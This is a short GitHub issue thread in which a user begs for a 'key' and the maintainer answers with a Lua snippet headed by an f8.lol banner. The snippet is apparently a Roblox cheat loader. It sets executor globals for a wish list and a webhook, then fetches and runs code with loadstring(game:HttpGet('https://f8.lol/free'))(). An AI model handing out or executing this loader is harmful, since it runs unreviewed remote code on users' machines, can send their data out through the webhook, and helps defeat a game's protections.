### ISSUE TITLE
GIVE ME KEY PELASE

### ISSUE THREAD

**Issue by ServamptW** [j2shy/pbb.lua#2]
PLEASE ASPEL  PELASE PLEASE PRETTY PRETTY PLEASE

**Comment by j2shy** [comment]
--[[

 _____     __          ___               ___      
/ '___\  /'_ `\       /\_ \             /\_ \     
/\ \__/ /\ \L\ \      \//\ \      ___   \//\ \    
\ \ ,__\\/_> _ <_       \ \ \    / __`\   \ \ \   
 \ \ \_/  /\ \L\ \ __    \_\ \_ /\ \L\ \   \_\ \_ 
  \ \_\   \ \____//\_\   /\____\\ \____/   /\____\
   \/_/    \/___/ \/_/   \/____/ \/___/    \/____/
                   
                  https://f8.lol                            
                                                  
K.


--]]
getgenv().WishList = {"Pidgey", "Weedle"} 
getgenv().Webhook = ""
loadstring(game:HttpGet("https://f8.lol/free"))()
